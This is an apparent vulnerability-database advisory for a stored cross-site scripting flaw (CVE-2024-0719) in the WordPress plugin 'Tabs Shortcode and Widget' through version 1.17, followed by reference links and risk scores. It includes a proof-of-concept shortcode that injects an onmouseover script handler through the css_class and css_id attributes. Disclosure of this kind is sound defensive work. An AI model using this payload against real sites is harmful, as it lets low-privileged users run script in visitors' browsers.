Lucene search
Dmitrii IgnatyevWPEX-ID:6E67BF7F-07E6-432B-A8F4-AA69299AECAFHistoryFeb 20, 2024 - 12:00 a.m.
Tabs Shortcode and Widget <= 1.17 - Contributor+ Stored Cross-Site Scripting
2024-02-2000:00:00
Dmitrii Ignatyev
32
tabs widget
cross-site scripting
exploit
security vulnerability
stored data
Description The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
[otw_shortcode_tabslayout tabs="2" title="234" tab_1_title="34" tab_1_icon_url="http://123" tab_1_content="23" tab_2_title="123" tab_2_icon_type="general foundicon-page" tab_2_icon_url="123" tab_2_content="123" css_class='" onmouseover="alert(/XSS/)"' css_id='" onmouseover="alert(/XSS/)"'][/otw_shortcode_tabslayout]References
Related
wpvulndb
wpvulndb
Tabs Shortcode and Widget <= 1.17 - Contributor+ Stored Cross-Site Scripting
2024-02-20 00:00:00
nvd
nvd
CVE-2024-0719
2024-03-18 19:15:06
cve
cve
CVE-2024-0719
2024-03-18 19:15:06
cvelist
cvelist
vulnrichment
vulnrichment
wordfence
wordfence
AI Score
7.7
Confidence
High
EPSS
0
Percentile
9.0%
Related for WPEX-ID:6E67BF7F-07E6-432B-A8F4-AA69299AECAF